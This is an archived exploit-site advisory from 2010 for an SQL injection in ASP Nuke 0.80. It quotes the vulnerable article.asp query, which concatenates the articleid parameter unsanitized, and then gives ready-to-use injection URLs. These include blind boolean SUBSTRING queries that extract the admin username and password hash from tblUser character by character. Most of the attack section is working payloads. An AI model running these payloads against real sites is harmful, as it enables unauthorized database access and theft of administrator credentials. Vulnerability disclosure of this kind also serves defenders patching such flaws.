Home / os / win7

ASP Nuke SQL Injection Vulnerability

Posted on 11 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ASP Nuke SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================
ASP Nuke SQL Injection Vulnerability
====================================

  Title            :  ASP Nuke Sql Injection Vulnerability
  Affected Version :  AspNuke 0.80
  Discovery        :  www.abysssec.com
  Vendor       :  http://www.aspnuke.com
 
 
  Download Links   :  http://sourceforge.net/projects/aspnukecms/
 
  
Description :
===========================================================================================     
 
1)- SQl Injection
  This version of ASP Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
 
  Valnerable Code  in .../module/article/article/article.asp:
 
  Ln 37:
        sStat = &quot;SELECT art.ArticleID, art.Title, art.ArticleBody, &quot; &amp;_
        &quot;       auth.FirstName, auth.LastName, &quot; &amp;_
        &quot;       cat.CategoryName, art.CommentCount, &quot; &amp;_
        &quot;       art.Created &quot; &amp;_
        &quot;FROM   tblArticle art &quot; &amp;_
        &quot;INNER JOIN tblArticleAuthor auth ON art.AuthorID = auth.AuthorID &quot; &amp;_
        &quot;INNER JOIN tblArticleToCategory atc ON atc.ArticleID = art.ArticleID &quot; &amp;_
        &quot;INNER JOIN tblArticleCategory cat ON atc.CategoryID = cat.CategoryID &quot; &amp;_
        &quot;WHERE  art.ArticleID = &quot; &amp; steForm(&quot;articleid&quot;) &amp; &quot; &quot; &amp;_
        &quot;AND    art.Active &lt;&gt; 0 &quot; &amp;_
        &quot;AND    art.Archive = 0&quot;
 
 
   Considering to the code, you can browse these URLs:
    
       http://www.site.com/module/article/article/article.asp?articleid=7'                 (the false Query will be shown)
       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'--    (this Query is always  true)
 
   with the following URL you can find the first character of Username: 
       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
    
   and second character:
       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
    
   and so on.
    
   So you gain Admin's information like this:
       Username : admin
       Password : (sha256 hash)
 
 
   Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file.
 
 
===========================================================================================


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :